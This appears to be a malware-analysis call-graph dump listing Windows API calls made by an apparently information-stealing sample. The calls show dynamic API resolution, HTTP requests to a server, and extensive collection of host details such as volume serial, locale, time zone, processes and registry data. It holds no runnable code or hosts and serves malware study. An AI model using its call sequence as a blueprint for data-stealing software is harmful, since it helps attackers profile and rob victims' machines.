1b4400 14648->14649 14650 1b45c0 2 API calls 14649->14650 14651 1b4419 14650->14651 14652 1b45c0 2 API calls 14651->14652 14653 1b4432 14652->14653 14654 1b45c0 2 API calls 14653->14654 14655 1b444b 14654->14655 14656 1b45c0 2 API calls 14655->14656 14657 1b4464 14656->14657 14658 1b45c0 2 API calls 14657->14658 14659 1b447d 14658->14659 14660 1b45c0 2 API calls 14659->14660 14661 1b4496 14660->14661 14662 1b45c0 2 API calls 14661->14662 14663 1b44af 14662->14663 14664 1b45c0 2 API calls 14663->14664 14665 1b44c8 14664->14665 14666 1b45c0 2 API calls 14665->14666 14667 1b44e1 14666->14667 14668 1b45c0 2 API calls 14667->14668 14669 1b44fa 14668->14669 14670 1b45c0 2 API calls 14669->14670 14671 1b4513 14670->14671 14672 1b45c0 2 API calls 14671->14672 14673 1b452c 14672->14673 14674 1b45c0 2 API calls 14673->14674 14675 1b4545 14674->14675 14676 1b45c0 2 API calls 14675->14676 14677 1b455e 14676->14677 14678 1b45c0 2 API calls 14677->14678 14679 1b4577 14678->14679 14680 1b45c0 2 API calls 14679->14680 14681 1b4590 14680->14681 14682 1b45c0 2 API calls 14681->14682 14683 1b45a9 14682->14683 14684 1c9c10 14683->14684 14685 1ca036 8 API calls 14684->14685 14686 1c9c20 43 API calls 14684->14686 14687 1ca0cc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14685->14687 14688 1ca146 14685->14688 14686->14685 14687->14688 14689 1ca216 14688->14689 14690 1ca153 8 API calls 14688->14690 14691 1ca21f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14689->14691 14692 1ca298 14689->14692 14690->14689 14691->14692 14693 1ca2a5 6 API calls 14692->14693 14694 1ca337 14692->14694 14693->14694 14695 1ca41f 14694->14695 14696 1ca344 9 API calls 14694->14696 14697 1ca428 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14695->14697 14698 1ca4a2 14695->14698 14696->14695 14697->14698 14699 1ca4dc 14698->14699 14700 1ca4ab GetProcAddress GetProcAddress 14698->14700 14701 1ca515 14699->14701 14702 1ca4e5 GetProcAddress GetProcAddress 14699->14702 14700->14699 14703 1ca612 14701->14703 14704 1ca522 10 API calls 14701->14704 14702->14701 14705 1ca67d 14703->14705 14706 1ca61b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14703->14706 14704->14703 14707 1ca69e 14705->14707 14708 1ca686 GetProcAddress 14705->14708 14706->14705 14709 1c5ca3 14707->14709 14710 1ca6a7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 14707->14710 14708->14707 14711 1b1590 14709->14711 14710->14709 15832 1b1670 14711->15832 14714 1ca7a0 lstrcpy 14715 1b15b5 14714->14715 14716 1ca7a0 lstrcpy 14715->14716 14717 1b15c7 14716->14717 14718 1ca7a0 lstrcpy 14717->14718 14719 1b15d9 14718->14719 14720 1ca7a0 lstrcpy 14719->14720 14721 1b1663 14720->14721 14722 1c5510 14721->14722 14723 1c5521 14722->14723 14724 1ca820 2 API calls 14723->14724 14725 1c552e 14724->14725 14726 1ca820 2 API calls 14725->14726 14727 1c553b 14726->14727 14728 1ca820 2 API calls 14727->14728 14729 1c5548 14728->14729 14730 1ca740 lstrcpy 14729->14730 14731 1c5555 14730->14731 14732 1ca740 lstrcpy 14731->14732 14733 1c5562 14732->14733 14734 1ca740 lstrcpy 14733->14734 14735 1c556f 14734->14735 14736 1ca740 lstrcpy 14735->14736 14775 1c557c 14736->14775 14737 1c5643 StrCmpCA 14737->14775 14738 1c56a0 StrCmpCA 14739 1c57dc 14738->14739 14738->14775 14740 1ca8a0 lstrcpy 14739->14740 14741 1c57e8 14740->14741 14742 1ca820 2 API calls 14741->14742 14743 1c57f6 14742->14743 14746 1ca820 2 API calls 14743->14746 14744 1c5856 StrCmpCA 14747 1c5991 14744->14747 14744->14775 14745 1ca740 lstrcpy 14745->14775 14749 1c5805 14746->14749 14748 1ca8a0 lstrcpy 14747->14748 14751 1c599d 14748->14751 14752 1b1670 lstrcpy 14749->14752 14750 1b1590 lstrcpy 14750->14775 14754 1ca820 2 API calls 14751->14754 14776 1c5811 14752->14776 14753 1ca820 lstrlen lstrcpy 14753->14775 14756 1c59ab 14754->14756 14755 1c52c0 25 API calls 14755->14775 14760 1ca820 2 API calls 14756->14760 14757 1c5a0b StrCmpCA 14758 1c5a28 14757->14758 14759 1c5a16 Sleep 14757->14759 14761 1ca8a0 lstrcpy 14758->14761 14759->14775 14762 1c59ba 14760->14762 14763 1c5a34 14761->14763 14764 1b1670 lstrcpy 14762->14764 14765 1ca820 2 API calls 14763->14765 14764->14776 14766 1c5a43 14765->14766 14767 1ca820 2 API calls 14766->14767 14768 1c5a52 14767->14768 14771 1b1670 lstrcpy 14768->14771 14769 1ca8a0 lstrcpy 14769->14775 14770 1c578a StrCmpCA 14770->14775 14771->14776 14772 1ca7a0 lstrcpy 14772->14775 14773 1c593f StrCmpCA 14773->14775 14774 1c51f0 20 API calls 14774->14775 14775->14737 14775->14738 14775->14744 14775->14745 14775->14750 14775->14753 14775->14755 14775->14757 14775->14769 14775->14770 14775->14772 14775->14773 14775->14774 14776->13829 14778 1c754c 14777->14778 14779 1c7553 GetVolumeInformationA 14777->14779 14778->14779 14783 1c7591 14779->14783 14780 1c75fc GetProcessHeap RtlAllocateHeap 14781 1c7628 wsprintfA 14780->14781 14782 1c7619 14780->14782 14785 1ca740 lstrcpy 14781->14785 14784 1ca740 lstrcpy 14782->14784 14783->14780 14786 1c5da7 14784->14786 14785->14786 14786->13850 14788 1ca7a0 lstrcpy 14787->14788 14789 1b4899 14788->14789 15841 1b47b0 14789->15841 14791 1b48a5 14792 1ca740 lstrcpy 14791->14792 14793 1b48d7 14792->14793 14794 1ca740 lstrcpy 14793->14794 14795 1b48e4 14794->14795 14796 1ca740 lstrcpy 14795->14796 14797 1b48f1 14796->14797 14798 1ca740 lstrcpy 14797->14798 14799 1b48fe 14798->14799 14800 1ca740 lstrcpy 14799->14800 14801 1b490b InternetOpenA StrCmpCA 14800->14801 14802 1b4944 14801->14802 14803 1b4ecb InternetCloseHandle 14802->14803 15847 1c8b60 14802->15847 14804 1b4ee8 14803->14804 15862 1b9ac0 CryptStringToBinaryA 14804->15862 14806 1b4963 15855 1ca920 14806->15855 14809 1b4976 14811 1ca8a0 lstrcpy 14809->14811 14816 1b497f 14811->14816 14812 1ca820 2 API calls 14813 1b4f05 14812->14813 14815 1ca9b0 4 API calls 14813->14815 14814 1b4f27 codecvt 14818 1ca7a0 lstrcpy 14814->14818 14817 1b4f1b 14815->14817 14820 1ca9b0 4 API calls 14816->14820 14819 1ca8a0 lstrcpy 14817->14819 14831 1b4f57 14818->14831 14819->14814 14821 1b49a9 14820->14821 14822 1ca8a0 lstrcpy 14821->14822 14823 1b49b2 14822->14823 14824 1ca9b0 4 API calls 14823->14824 14825 1b49d1 14824->14825 14826 1ca8a0 lstrcpy 14825->14826 14827 1b49da 14826->14827 14828 1ca920 3 API calls 14827->14828 14829 1b49f8 14828->14829 14830 1ca8a0 lstrcpy 14829->14830 14832 1b4a01 14830->14832 14831->13853 14833 1ca9b0 4 API calls 14832->14833 14834 1b4a20 14833->14834 14835 1ca8a0 lstrcpy 14834->14835 14836 1b4a29 14835->14836 14837 1ca9b0 4 API calls 14836->14837 14838 1b4a48 14837->14838 14839 1ca8a0 lstrcpy 14838->14839 14840 1b4a51 14839->14840 14841 1ca9b0 4 API calls 14840->14841 14842 1b4a7d 14841->14842 14843 1ca920 3 API calls 14842->14843 14844 1b4a84 14843->14844 14845 1ca8a0 lstrcpy 14844->14845 14846 1b4a8d 14845->14846 14847 1b4aa3 InternetConnectA 14846->14847 14847->14803 14848 1b4ad3 HttpOpenRequestA 14847->14848 14850 1b4b28 14848->14850 14851 1b4ebe InternetCloseHandle 14848->14851 14852 1ca9b0 4 API calls 14850->14852 14851->14803 14853 1b4b3c 14852->14853 14854 1ca8a0 lstrcpy 14853->14854 14855 1b4b45 14854->14855 14856 1ca920 3 API calls 14855->14856 14857 1b4b63 14856->14857 14858 1ca8a0 lstrcpy 14857->14858 14859 1b4b6c 14858->14859 14860 1ca9b0 4 API calls 14859->14860 14861 1b4b8b 14860->14861 14862 1ca8a0 lstrcpy 14861->14862 14863 1b4b94 14862->14863 14864 1ca9b0 4 API calls 14863->14864 14865 1b4bb5 14864->14865 14866 1ca8a0 lstrcpy 14865->14866 14867 1b4bbe 14866->14867 14868 1ca9b0 4 API calls 14867->14868 14869 1b4bde 14868->14869 14870 1ca8a0 lstrcpy 14869->14870 14871 1b4be7 14870->14871 14872 1ca9b0 4 API calls 14871->14872 14873 1b4c06 14872->14873 14874 1ca8a0 lstrcpy 14873->14874 14875 1b4c0f 14874->14875 14876 1ca920 3 API calls 14875->14876 14877 1b4c2d 14876->14877 14878 1ca8a0 lstrcpy 14877->14878 14879 1b4c36 14878->14879 14880 1ca9b0 4 API calls 14879->14880 14881 1b4c55 14880->14881 14882 1ca8a0 lstrcpy 14881->14882 14883 1b4c5e 14882->14883 14884 1ca9b0 4 API calls 14883->14884 14885 1b4c7d 14884->14885 14886 1ca8a0 lstrcpy 14885->14886 14887 1b4c86 14886->14887 14888 1ca920 3 API calls 14887->14888 14889 1b4ca4 14888->14889 14890 1ca8a0 lstrcpy 14889->14890 14891 1b4cad 14890->14891 14892 1ca9b0 4 API calls 14891->14892 14893 1b4ccc 14892->14893 14894 1ca8a0 lstrcpy 14893->14894 14895 1b4cd5 14894->14895 14896 1ca9b0 4 API calls 14895->14896 14897 1b4cf6 14896->14897 14898 1ca8a0 lstrcpy 14897->14898 14899 1b4cff 14898->14899 14900 1ca9b0 4 API calls 14899->14900 14901 1b4d1f 14900->14901 14902 1ca8a0 lstrcpy 14901->14902 14903 1b4d28 14902->14903 14904 1ca9b0 4 API calls 14903->14904 14905 1b4d47 14904->14905 14906 1ca8a0 lstrcpy 14905->14906 14907 1b4d50 14906->14907 14908 1ca920 3 API calls 14907->14908 14909 1b4d6e 14908->14909 14910 1ca8a0 lstrcpy 14909->14910 14911 1b4d77 14910->14911 14912 1ca740 lstrcpy 14911->14912 14913 1b4d92 14912->14913 14914 1ca920 3 API calls 14913->14914 14915 1b4db3 14914->14915 14916 1ca920 3 API calls 14915->14916 14917 1b4dba 14916->14917 14918 1ca8a0 lstrcpy 14917->14918 14919 1b4dc6 14918->14919 14920 1b4de7 lstrlen 14919->14920 14921 1b4dfa 14920->14921 14922 1b4e03 lstrlen 14921->14922 15861 1caad0 14922->15861 14924 1b4e13 HttpSendRequestA 14925 1b4e32 InternetReadFile 14924->14925 14926 1b4e67 InternetCloseHandle 14925->14926 14931 1b4e5e 14925->14931 14929 1ca800 14926->14929 14928 1ca9b0 4 API calls 14928->14931 14929->14851 14930 1ca8a0 lstrcpy 14930->14931 14931->14925 14931->14926 14931->14928 14931->14930 15868 1caad0 14932->15868 14934 1c17c4 StrCmpCA 14935 1c17cf ExitProcess 14934->14935 14939 1c17d7 14934->14939 14936 1c19c2 14936->13855 14937 1c185d StrCmpCA 14937->14939 14938 1c187f StrCmpCA 14938->14939 14939->14936 14939->14937 14939->14938 14940 1c1970 StrCmpCA 14939->14940 14941 1c18f1 StrCmpCA 14939->14941 14942 1c1951 StrCmpCA 14939->14942 14943 1c1932 StrCmpCA 14939->14943 14944 1c1913 StrCmpCA 14939->14944 14945 1c18ad StrCmpCA 14939->14945 14946 1c18cf StrCmpCA 14939->14946 14947 1ca820 lstrlen lstrcpy 14939->14947 14940->14939 14941->14939 14942->14939 14943->14939 14944->14939 14945->14939 14946->14939 14947->14939 14949 1ca7a0 lstrcpy 14948->14949 14950 1b5979 14949->14950 14951 1b47b0 2 API calls 14950->14951 14952 1b5985 14951->14952 14953 1ca740 lstrcpy 14952->14953 14954 1b59ba 14953->14954 14955 1ca740 lstrcpy 14954->14955 14956 1b59c7 14955->14956 14957 1ca740 lstrcpy 14956->14957 14958 1b59d4 14957->14958 14959 1ca740 lstrcpy 14958->14959 14960 1b59e1 14959->14960 14961 1ca740 lstrcpy 14960->14961 14962 1b59ee InternetOpenA StrCmpCA 14961->14962 14963 1b5a1d 14962->14963 14964 1b5fc3 InternetCloseHandle 14963->14964 14965 1c8b60 3 API calls 14963->14965 14966 1b5fe0 14964->14966 14967 1b5a3c 14965->14967 14969 1b9ac0 4 API calls 14966->14969 14968 1ca920 3 API calls 14967->14968 14970 1b5a4f 14968->14970 14971 1b5fe6 14969->14971 14972 1ca8a0 lstrcpy 14970->14972 14973 1ca820 2 API calls 14971->14973 14976 1b601f codecvt 14971->14976 14978 1b5a58 14972->14978 14974 1b5ffd 14973->14974 14975 1ca9b0 4 API calls 14974->14975 14977 1b6013 14975->14977 14980 1ca7a0 lstrcpy 14976->14980 14979 1ca8a0 lstrcpy 14977->14979 14981 1ca9b0 4 API calls 14978->14981 14979->14976 14989 1b604f 14980->14989 14982 1b5a82 14981->14982 14983 1ca8a0 lstrcpy 14982->14983 14984 1b5a8b 14983->14984 14985 1ca9b0 4 API calls 14984->14985 14986 1b5aaa 14985->14986 14987 1ca8a0 lstrcpy 14986->14987 14988 1b5ab3 14987->14988 14990 1ca920 3 API calls 14988->14990 14989->13861 14991 1b5ad1 14990->14991 14992 1ca8a0 lstrcpy 14991->14992 14993 1b5ada 14992->14993 14994 1ca9b0 4 API calls 14993->14994 14995 1b5af9 14994->14995 14996 1ca8a0 lstrcpy 14995->14996 14997 1b5b02 14996->14997 14998 1ca9b0 4 API calls 14997->14998 14999 1b5b21 14998->14999 15000 1ca8a0 lstrcpy 14999->15000 15001 1b5b2a 15000->15001 15002 1ca9b0 4 API calls 15001->15002 15003 1b5b56 15002->15003 15004 1ca920 3 API calls 15003->15004 15005 1b5b5d 15004->15005 15006 1ca8a0 lstrcpy 15005->15006 15007 1b5b66 15006->15007 15008 1b5b7c InternetConnectA 15007->15008 15008->14964 15009 1b5bac HttpOpenRequestA 15008->15009 15011 1b5c0b 15009->15011 15012 1b5fb6 InternetCloseHandle 15009->15012 15013 1ca9b0 4 API calls 15011->15013 15012->14964 15014 1b5c1f 15013->15014 15015 1ca8a0 lstrcpy 15014->15015 15016 1b5c28 15015->15016 15017 1ca920 3 API calls 15016->15017 15018 1b5c46 15017->15018 15019 1ca8a0 lstrcpy 15018->15019 15020 1b5c4f 15019->15020 15021 1ca9b0 4 API calls 15020->15021 15022 1b5c6e 15021->15022 15023 1ca8a0 lstrcpy 15022->15023 15024 1b5c77 15023->15024 15025 1ca9b0 4 API calls 15024->15025 15026 1b5c98 15025->15026 15027 1ca8a0 lstrcpy 15026->15027 15028 1b5ca1 15027->15028 15029 1ca9b0 4 API calls 15028->15029 15030 1b5cc1 15029->15030 15031 1ca8a0 lstrcpy 15030->15031 15032 1b5cca 15031->15032 15033 1ca9b0 4 API calls 15032->15033 15034 1b5ce9 15033->15034 15035 1ca8a0 lstrcpy 15034->15035 15036 1b5cf2 15035->15036 15037 1ca920 3 API calls 15036->15037 15038 1b5d10 15037->15038 15039 1ca8a0 lstrcpy 15038->15039 15040 1b5d19 15039->15040 15041 1ca9b0 4 API calls 15040->15041 15042 1b5d38 15041->15042 15043 1ca8a0 lstrcpy 15042->15043 15044 1b5d41 15043->15044 15045 1ca9b0 4 API calls 15044->15045 15046 1b5d60 15045->15046 15047 1ca8a0 lstrcpy 15046->15047 15048 1b5d69 15047->15048 15049 1ca920 3 API calls 15048->15049 15050 1b5d87 15049->15050 15051 1ca8a0 lstrcpy 15050->15051 15052 1b5d90 15051->15052 15053 1ca9b0 4 API calls 15052->15053 15054 1b5daf 15053->15054 15055 1ca8a0 lstrcpy 15054->15055 15056 1b5db8 15055->15056 15057 1ca9b0 4 API calls 15056->15057 15058 1b5dd9 15057->15058 15059 1ca8a0 lstrcpy 15058->15059 15060 1b5de2 15059->15060 15061 1ca9b0 4 API calls 15060->15061 15062 1b5e02 15061->15062 15063 1ca8a0 lstrcpy 15062->15063 15064 1b5e0b 15063->15064 15065 1ca9b0 4 API calls 15064->15065 15066 1b5e2a 15065->15066 15067 1ca8a0 lstrcpy 15066->15067 15068 1b5e33 15067->15068 15069 1ca920 3 API calls 15068->15069 15070 1b5e54 15069->15070 15071 1ca8a0 lstrcpy 15070->15071 15072 1b5e5d 15071->15072 15073 1b5e70 lstrlen 15072->15073 15869 1caad0 15073->15869 15075 1b5e81 lstrlen GetProcessHeap RtlAllocateHeap 15870 1caad0 15075->15870 15077 1b5eae lstrlen 15078 1b5ebe 15077->15078 15079 1b5ed7 lstrlen 15078->15079 15080 1b5ee7 15079->15080 15081 1b5ef0 lstrlen 15080->15081 15082 1b5f04 15081->15082 15083 1b5f1a lstrlen 15082->15083 15871 1caad0 15083->15871 15085 1b5f2a HttpSendRequestA 15086 1b5f35 InternetReadFile 15085->15086 15087 1b5f6a InternetCloseHandle 15086->15087 15091 1b5f61 15086->15091 15087->15012 15089 1ca9b0 4 API calls 15089->15091 15090 1ca8a0 lstrcpy 15090->15091 15091->15086 15091->15087 15091->15089 15091->15090 15093 1c1077 15092->15093 15094 1c1151 15093->15094 15095 1ca820 lstrlen lstrcpy 15093->15095 15094->13863 15095->15093 15101 1c0db7 15096->15101 15097 1c0f17 15097->13871 15098 1c0ea4 StrCmpCA 15098->15101 15099 1c0e27 StrCmpCA 15099->15101 15100 1c0e67 StrCmpCA 15100->15101 15101->15097 15101->15098 15101->15099 15101->15100 15102 1ca820 lstrlen lstrcpy 15101->15102 15102->15101 15106 1c0f67 15103->15106 15104 1c1044 15104->13879 15105 1c0fb2 StrCmpCA 15105->15106 15106->15104 15106->15105 15107 1ca820 lstrlen lstrcpy 15106->15107 15107->15106 15109 1ca740 lstrcpy 15108->15109 15110 1c1a26 15109->15110 15111 1ca9b0 4 API calls 15110->15111 15112 1c1a37 15111->15112 15113 1ca8a0 lstrcpy 15112->15113 15114 1c1a40 15113->15114 15115 1ca9b0 4 API calls 15114->15115 15116 1c1a5b 15115->15116 15117 1ca8a0 lstrcpy 15116->15117 15118 1c1a64 15117->15118 15119 1ca9b0 4 API calls 15118->15119 15120 1c1a7d 15119->15120 15121 1ca8a0 lstrcpy 15120->15121 15122 1c1a86 15121->15122 15123 1ca9b0 4 API calls 15122->15123 15124 1c1aa1 15123->15124 15125 1ca8a0 lstrcpy 15124->15125 15126 1c1aaa 15125->15126 15127 1ca9b0 4 API calls 15126->15127 15128 1c1ac3 15127->15128 15129 1ca8a0 lstrcpy 15128->15129 15130 1c1acc 15129->15130 15131 1ca9b0 4 API calls 15130->15131 15132 1c1ae7 15131->15132 15133 1ca8a0 lstrcpy 15132->15133 15134 1c1af0 15133->15134 15135 1ca9b0 4 API calls 15134->15135 15136 1c1b09 15135->15136 15137 1ca8a0 lstrcpy 15136->15137 15138 1c1b12 15137->15138 15139 1ca9b0 4 API calls 15138->15139 15140 1c1b2d 15139->15140 15141 1ca8a0 lstrcpy 15140->15141 15142 1c1b36 15141->15142 15143 1ca9b0 4 API calls 15142->15143 15144 1c1b4f 15143->15144 15145 1ca8a0 lstrcpy 15144->15145 15146 1c1b58 15145->15146 15147 1ca9b0 4 API calls 15146->15147 15148 1c1b76 15147->15148 15149 1ca8a0 lstrcpy 15148->15149 15150 1c1b7f 15149->15150 15151 1c7500 6 API calls 15150->15151 15152 1c1b96 15151->15152 15153 1ca920 3 API calls 15152->15153 15154 1c1ba9 15153->15154 15155 1ca8a0 lstrcpy 15154->15155 15156 1c1bb2 15155->15156 15157 1ca9b0 4 API calls 15156->15157 15158 1c1bdc 15157->15158 15159 1ca8a0 lstrcpy 15158->15159 15160 1c1be5 15159->15160 15161 1ca9b0 4 API calls 15160->15161 15162 1c1c05 15161->15162 15163 1ca8a0 lstrcpy 15162->15163 15164 1c1c0e 15163->15164 15872 1c7690 GetProcessHeap RtlAllocateHeap 15164->15872 15167 1ca9b0 4 API calls 15168 1c1c2e 15167->15168 15169 1ca8a0 lstrcpy 15168->15169 15170 1c1c37 15169->15170 15171 1ca9b0 4 API calls 15170->15171 15172 1c1c56 15171->15172 15173 1ca8a0 lstrcpy 15172->15173 15174 1c1c5f 15173->15174 15175 1ca9b0 4 API calls 15174->15175 15176 1c1c80 15175->15176 15177 1ca8a0 lstrcpy 15176->15177 15178 1c1c89 15177->15178 15879 1c77c0 GetCurrentProcess IsWow64Process 15178->15879 15181 1ca9b0 4 API calls 15182 1c1ca9 15181->15182 15183 1ca8a0 lstrcpy 15182->15183 15184 1c1cb2 15183->15184 15185 1ca9b0 4 API calls 15184->15185 15186 1c1cd1 15185->15186 15187 1ca8a0 lstrcpy 15186->15187 15188 1c1cda 15187->15188 15189 1ca9b0 4 API calls 15188->15189 15190 1c1cfb 15189->15190 15191 1ca8a0 lstrcpy 15190->15191 15192 1c1d04 15191->15192 15193 1c7850 3 API calls 15192->15193 15194 1c1d14 15193->15194 15195 1ca9b0 4 API calls 15194->15195 15196 1c1d24 15195->15196 15197 1ca8a0 lstrcpy 15196->15197 15198 1c1d2d 15197->15198 15199 1ca9b0 4 API calls 15198->15199 15200 1c1d4c 15199->15200 15201 1ca8a0 lstrcpy 15200->15201 15202 1c1d55 15201->15202 15203 1ca9b0 4 API calls 15202->15203 15204 1c1d75 15203->15204 15205 1ca8a0 lstrcpy 15204->15205 15206 1c1d7e 15205->15206 15207 1c78e0 3 API calls 15206->15207 15208 1c1d8e 15207->15208 15209 1ca9b0 4 API calls 15208->15209 15210 1c1d9e 15209->15210 15211 1ca8a0 lstrcpy 15210->15211 15212 1c1da7 15211->15212 15213 1ca9b0 4 API calls 15212->15213 15214 1c1dc6 15213->15214 15215 1ca8a0 lstrcpy 15214->15215 15216 1c1dcf 15215->15216 15217 1ca9b0 4 API calls 15216->15217 15218 1c1df0 15217->15218 15219 1ca8a0 lstrcpy 15218->15219 15220 1c1df9 15219->15220 15881 1c7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15220->15881 15223 1ca9b0 4 API calls 15224 1c1e19 15223->15224 15225 1ca8a0 lstrcpy 15224->15225 15226 1c1e22 15225->15226 15227 1ca9b0 4 API calls 15226->15227 15228 1c1e41 15227->15228 15229 1ca8a0 lstrcpy 15228->15229 15230 1c1e4a 15229->15230 15231 1ca9b0 4 API calls 15230->15231 15232 1c1e6b 15231->15232 15233 1ca8a0 lstrcpy 15232->15233 15234 1c1e74 15233->15234 15883 1c7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15234->15883 15237 1ca9b0 4 API calls 15238 1c1e94 15237->15238 15239 1ca8a0 lstrcpy 15238->15239 15240 1c1e9d 15239->15240 15241 1ca9b0 4 API calls 15240->15241 15242 1c1ebc 15241->15242 15243 1ca8a0 lstrcpy 15242->15243 15244 1c1ec5 15243->15244 15245 1ca9b0 4 API calls 15244->15245 15246 1c1ee5 15245->15246 15247 1ca8a0 lstrcpy 15246->15247 15248 1c1eee 15247->15248 15886 1c7b00 GetUserDefaultLocaleName 15248->15886 15251 1ca9b0 4 API calls 15252 1c1f0e 15251->15252 15253 1ca8a0 lstrcpy 15252->15253 15254 1c1f17 15253->15254 15255 1ca9b0 4 API calls 15254->15255 15256 1c1f36 15255->15256 15257 1ca8a0 lstrcpy 15256->15257 15258 1c1f3f 15257->15258 15259 1ca9b0 4 API calls 15258->15259 15260 1c1f60 15259->15260 15261 1ca8a0 lstrcpy 15260->15261 15262 1c1f69 15261->15262 15890 1c7b90 15262->15890 15264 1c1f80 15265 1ca920 3 API calls 15264->15265 15266 1c1f93 15265->15266 15267 1ca8a0 lstrcpy 15266->15267 15268 1c1f9c 15267->15268 15269 1ca9b0 4 API calls 15268->15269 15270 1c1fc6 15269->15270 15271 1ca8a0 lstrcpy 15270->15271 15272 1c1fcf 15271->15272 15273 1ca9b0 4 API calls 15272->15273 15274 1c1fef 15273->15274 15275 1ca8a0 lstrcpy 15274->15275 15276 1c1ff8 15275->15276 15902 1c7d80 GetSystemPowerStatus 15276->15902 15279 1ca9b0 4 API calls 15280 1c2018 15279->15280 15281 1ca8a0 lstrcpy 15280->15281 15282 1c2021 15281->15282 15283 1ca9b0 4 API calls 15282->15283 15284 1c2040 15283->15284 15285 1ca8a0 lstrcpy 15284->15285 15286 1c2049 15285->15286 15287 1ca9b0 4 API calls 15286->15287 15288 1c206a 15287->15288 15289 1ca8a0 lstrcpy 15288->15289 15290 1c2073 15289->15290 15291 1c207e GetCurrentProcessId 15290->15291 15904 1c9470 OpenProcess 15291->15904 15294 1ca920 3 API calls 15295 1c20a4 15294->15295 15296 1ca8a0 lstrcpy 15295->15296 15297 1c20ad 15296->15297 15298 1ca9b0 4 API calls 15297->15298 15299 1c20d7 15298->15299 15300 1ca8a0 lstrcpy 15299->15300 15301 1c20e0 15300->15301 15302 1ca9b0 4 API calls 15301->15302 15303 1c2100 15302->15303 15304 1ca8a0 lstrcpy 15303->15304 15305 1c2109 15304->15305 15909 1c7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15305->15909 15308 1ca9b0 4 API calls 15309 1c2129 15308->15309 15310 1ca8a0 lstrcpy 15309->15310 15311 1c2132 15310->15311 15312 1ca9b0 4 API calls 15311->15312 15313 1c2151 15312->15313 15314 1ca8a0 lstrcpy 15313->15314 15315 1c215a 15314->15315 15316 1ca9b0 4 API calls 15315->15316 15317 1c217b 15316->15317 15318 1ca8a0 lstrcpy 15317->15318 15319 1c2184 15318->15319 15913 1c7f60 15319->15913 15322 1ca9b0 4 API calls 15323 1c21a4 15322->15323 15324 1ca8a0 lstrcpy 15323->15324 15325 1c21ad 15324->15325 15326 1ca9b0 4 API calls 15325->15326 15327 1c21cc 15326->15327 15328 1ca8a0 lstrcpy 15327->15328 15329 1c21d5 15328->15329 15330 1ca9b0 4 API calls 15329->15330 15331 1c21f6 15330->15331 15332 1ca8a0 lstrcpy 15331->15332 15333 1c21ff 15332->15333 15926 1c7ed0 GetSystemInfo wsprintfA 15333->15926 15336 1ca9b0 4 API calls 15337 1c221f 15336->15337 15338 1ca8a0 lstrcpy 15337->15338 15339 1c2228 15338->15339 15340 1ca9b0 4 API calls 15339->15340 15341 1c2247 15340->15341 15342 1ca8a0 lstrcpy 15341->15342 15343 1c2250 15342->15343 15344 1ca9b0 4 API calls 15343->15344 15345 1c2270 15344->15345 15346 1ca8a0 lstrcpy 15345->15346 15347 1c2279 15346->15347 15928 1c8100 GetProcessHeap RtlAllocateHeap 15347->15928 15350 1ca9b0 4 API calls 15351 1c2299 15350->15351 15352 1ca8a0 lstrcpy 15351->15352 15353 1c22a2 15352->15353 15354 1ca9b0 4 API calls 15353->15354 15355 1c22c1 15354->15355 15356 1ca8a0 lstrcpy 15355->15356 15357 1c22ca 15356->15357 15358 1ca9b0 4 API calls 15357->15358 15359 1c22eb 15358->15359 15360 1ca8a0 lstrcpy 15359->15360 15361 1c22f4 15360->15361 15934 1c87c0 15361->15934 15364 1ca920 3 API calls 15365 1c231e 15364->15365 15366 1ca8a0 lstrcpy 15365->15366 15367 1c2327 15366->15367 15368 1ca9b0 4 API calls 15367->15368 15369 1c2351 15368->15369 15370 1ca8a0 lstrcpy 15369->15370 15371 1c235a 15370->15371 15372 1ca9b0 4 API calls 15371->15372 15373 1c237a 15372->15373 15374 1ca8a0 lstrcpy 15373->15374 15375 1c2383 15374->15375 15376 1ca9b0 4 API calls 15375->15376 15377 1c23a2 15376->15377 15378 1ca8a0 lstrcpy 15377->15378 15379 1c23ab 15378->15379 15939 1c81f0 15379->15939 15381 1c23c2 15382 1ca920 3 API calls 15381->15382 15383 1c23d5 15382->15383 15384 1ca8a0 lstrcpy 15383->15384 15385 1c23de 15384->15385 15386 1ca9b0 4 API calls 15385->15386 15387 1c240a 15386->15387 15388 1ca8a0 lstrcpy 15387->15388 15389 1c2413 15388->15389 15390 1ca9b0 4 API calls 15389->15390 15391 1c2432 15390->15391 15392 1ca8a0 lstrcpy 15391->15392 15393 1c243b 15392->15393 15394 1ca9b0 4 API calls 15393->15394 15395 1c245c 15394->15395 15396 1ca8a0 lstrcpy 15395->15396 15397 1c2465 15396->15397 15398 1ca9b0 4 API calls 15397->15398 15399 1c2484 15398->15399 15400 1ca8a0 lstrcpy 15399->15400 15401 1c248d 15400->15401 15402 1ca9b0 4 API calls 15401->15402 15403 1c24ae 15402->15403 15404 1ca8a0 lstrcpy 15403->15404 15405 1c24b7 15404->15405 15947 1c8320 15405->15947 15407 1c24d3 15408 1ca920 3 API calls 15407->15408 15409 1c24e6 15408->15409 15410 1ca8a0 lstrcpy 15409->15410 15411 1c24ef 15410->15411 15412 1ca9b0 4 API calls 15411->15412 15413 1c2519 15412->15413 15414 1ca8a0 lstrcpy 15413->15414 15415 1c2522 15414->15415 15416 1ca9b0 4 API calls 15415->15416 15417 1c2543 15416->15417 15418 1ca8a0 lstrcpy 15417->15418 15419 1c254c 15418->15419 15420 1c8320 17 API calls 15419->15420 15421 1c2568 15420->15421 15422 1ca920 3 API calls 15421->15422 15423 1c257b 15422->15423 15424 1ca8a0 lstrcpy 15423->15424 15425 1c2584 15424->15425 15426 1ca9b0 4 API calls 15425->15426 15427 1c25ae 15426->15427 15428 1ca8a0 lstrcpy 15427->15428 15429 1c25b7 15428->15429 15430 1ca9b0 4 API calls 15429->15430 15431 1c25d6 15430->15431 15432 1ca8a0 lstrcpy 15431->15432 15433 1c25df 15432->15433 15434 1ca9b0 4 API calls 15433->15434 15435 1c2600 15434->15435 15436 1ca8a0 lstrcpy 15435->15436 15437 1c2609 15436->15437 15983 1c8680 15437->15983 15439 1c2620 15440 1ca920 3 API calls 15439->15440 15441 1c2633 15440->15441 15442 1ca8a0 lstrcpy 15441->15442 15443 1c263c 15442->15443 15444 1c265a lstrlen 15443->15444 15445 1c266a 15444->15445 15446 1ca740 